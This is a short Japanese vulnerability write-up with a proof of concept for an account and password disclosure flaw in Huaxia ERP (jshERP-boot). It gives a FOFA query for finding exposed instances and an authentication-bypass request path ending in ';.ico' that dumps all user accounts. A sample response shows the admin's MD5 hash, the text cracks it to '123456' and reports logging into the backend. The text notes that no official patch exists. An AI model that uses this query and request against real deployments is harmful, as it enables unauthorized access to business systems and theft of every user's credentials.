説明する
Huaxia ERP は、SpringBoot フレームワークと SaaS モデルに基づいたシステムです。
Huaxia ERP にはアカウントとパスワードの漏洩の脆弱性があり、攻撃者はこの脆弱性を利用してシステム内のすべてのアカウントのパスワードを取得し、システムにログインして悪意のある攻撃を実行する可能性があります。
現在、この脆弱性を修正する正式なセキュリティ バージョンはリリースされていないため、強化の提案については製造元に問い合わせることをお勧めします。
fofa 構文: "jshERP-boot"
POC
/jshERP-boot/user/getAllList;.ico
{
"id": 120,
"username": "管理员",
"loginName": "admin",
"password": "e10adc3949ba59abbe56e057f20f883e",
"position": null,
"department": null,
"email": null,
"phonenum": null,
"ismanager": 1,
"isystem": 0,
"status": 0,
"description": null,
"remark": null,
"tenantId": 0
},
管理者アカウントの md5 暗号化値を取得します。
(管理者はプラットフォームの運用および保守ユーザーのみであり、実際の管理者はテナント (テスト アカウントは jsh) です。管理者はビジネス データを編集できず、プラットフォーム メニューの構成とテナントの作成のみが可能です)
復号化後に取得したパスワード: 123456
バックエンドへのログインに成功しました